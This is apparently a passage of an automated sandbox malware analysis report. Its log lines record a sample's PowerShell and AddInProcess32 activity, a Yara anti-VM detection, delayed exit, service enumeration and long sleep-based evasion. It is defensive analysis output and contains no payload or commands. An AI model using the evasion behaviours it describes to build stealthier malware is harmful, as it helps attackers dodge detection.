                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7084, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040F7E2 Sleep,ExitProcess,23_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,23_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1708Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 827Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3373Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6470Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6975Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 757Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7457Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1439Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1555Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1846Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 959
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5692
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3929
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1754
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 786
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 854
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 6.2 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 9.4 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep count: 3373 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep count: 6470 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 6975 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 757 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 7457 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 1439 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 1555 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 1846 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 959 > 30
